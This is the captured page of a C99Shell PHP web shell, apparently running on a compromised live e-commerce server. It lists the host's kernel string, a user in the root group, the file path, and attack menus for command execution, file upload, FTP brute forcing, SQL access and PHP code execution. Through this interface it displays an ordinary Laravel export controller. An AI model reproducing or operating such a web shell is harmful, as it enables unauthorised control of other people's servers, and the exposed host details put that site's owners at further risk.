!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/ecom1.picotech.app/public_html_ecom1/app/Http/Controllers/Vendor/   drwxr-xr-x
Free 26.13 GB of 117.98 GB (22.15%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     ExportController.php (1.53 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
 * @package ExportController
 * @author TechVillage <support@techvill.org>
 * @contributor Sakawat Hossain Rony <[sakawat.techvill@gmail.com]>
 * @created 07-05-2022
 */
namespace App\Http\Controllers\Vendor;

use 
App\Http\Controllers\Controller;
use 
App\Models\ProductCategory;
use 
App\Services\Export\ProductExportService;
use 
Illuminate\Http\Request;

class 
ExportController extends Controller
{
    
/**
     * product export
     *
     * @param Request $request
     * @return \Illuminate\Contracts\Foundation\Application|\Illuminate\Contracts\View\Factory|\Illuminate\Contracts\View\View|\Illuminate\Http\RedirectResponse|mixed
     */
    
public function productExport(Request $request)
    {
        if (
$request->isMethod('get')) {
            
$data['productCategories'] = ProductCategory::join("categories""product_categories.category_id""categories.id")
                ->
join("products""products.id""product_categories.product_id")
                ->
selectRaw("categories.name, categories.id")
                ->
distinct()
                ->
get();

            
$data['columns'] = getProductExportColumn();

            return 
view('vendor.epz.export.product'$data);
        }

        
$export = new ProductExportService($request);

        if (!
$export->process()) {
            
$response $this->messageArray($export->getError(), 'fail');
            
$this->setSessionValue($response);

            return 
redirect()->back();
        }

        return 
$export->getResponse();
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.004 ]--